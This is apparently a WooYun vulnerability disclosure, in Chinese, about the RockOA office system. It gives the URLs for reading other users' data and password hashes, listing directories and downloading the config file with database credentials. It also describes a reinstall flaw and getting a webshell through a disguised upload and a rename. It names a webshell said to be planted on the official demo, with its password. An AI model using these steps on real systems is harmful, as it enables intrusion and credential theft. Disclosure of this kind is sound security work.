WooYun.org

做了下审计，打了个包
首先我们先登录一个普通权限的用户，如测试账号lvbu，密码123456
然后访问http://xxx.com/rock.php?a=loadinfor&m=userinfor&d=humanres&id=1&ajaxbool=true
通过修改id值即可获取不同用户的信息，包括md5加密后的密码

好，到文件操作部分
首先是任意文件夹读取，访问http://xxx.com/rock.php?a=getsysfilod&m=dir&d=system&ajaxbool=true

列出文件
访问http://xxx.com/rock.php?a=getfile&m=dir&d=system&ajaxbool=true

文件下载
访问http://xxx.com/rock.php?a=open&m=dir&d=system&ajaxbool=true&path=webrock/webrockConfig.php

其实下载后打开的内容是webrockConfig.php里的内容

可解密，这里我换成了*号
解密调用图里的函数

获得数据库账号密码后，很少人会删除掉webrock下的install目录，官网demo也没有，造成本地重装漏洞

这里就不拿官方demo做演示了
好，到getshell部分了
首先我们先到网盘的地方上传一个改了后缀名为jpg的一句话文件
点击下载获得链接
http://demo.rockoa.com/upload/2015-12/27_0202571895.jpg

这里再利用另外一个漏洞，重命名

官网demo已getshell
地址http://demo.rockoa.com/upload/2015-12/123.php，passwd：wooyun，请及时删除
以上漏洞均可在http://demo.rockoa.com/重现